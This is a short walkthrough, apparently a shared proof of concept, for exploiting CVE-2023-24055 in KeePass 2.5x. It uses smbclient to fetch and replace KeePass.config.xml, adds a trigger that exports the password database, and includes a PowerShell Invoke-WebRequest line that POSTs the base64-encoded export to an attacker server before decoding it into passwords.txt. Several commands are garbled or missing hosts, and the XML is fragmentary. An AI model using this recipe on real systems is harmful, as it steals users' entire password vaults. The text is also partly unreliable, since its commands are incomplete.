CVE-2023-24055 KeePass 2.5x

  1. Connect to the target
  2. Download the config
  3. Add a trigger
  4. Put it back in the target.
  5. Create a web server
  6. Decode

I’m not the author of this POC.

Connect to the target

Show directories.

smbclient -L //

Connect to shared directory.

smbclient \\\\\\Roaming

Download the config

get KeePass\KeePass.config.xml

This is how looks like the file.

Add a trigger

The POC:

						<Parameter />
			<Conditions />
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter> # This one
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one
						<Parameter />

I have to change 2 lines.
The first one to replace by the user of the windows.
The second for the same ting + give the address of the web server.
This is my version:

						<Parameter>c:\Users\peanutstick\AppData\Local\Temp\exploit.xml</Parameter> # This one
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\peanutstick\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one

Put it back in the target.

Create a web server

We need a web server where we can user PUT method.
This one is good:
Now we have to open it and wait, the windows user need to save a new password

And Voila, with the file in base 64


echo "string" | base64 -d > passwords.txt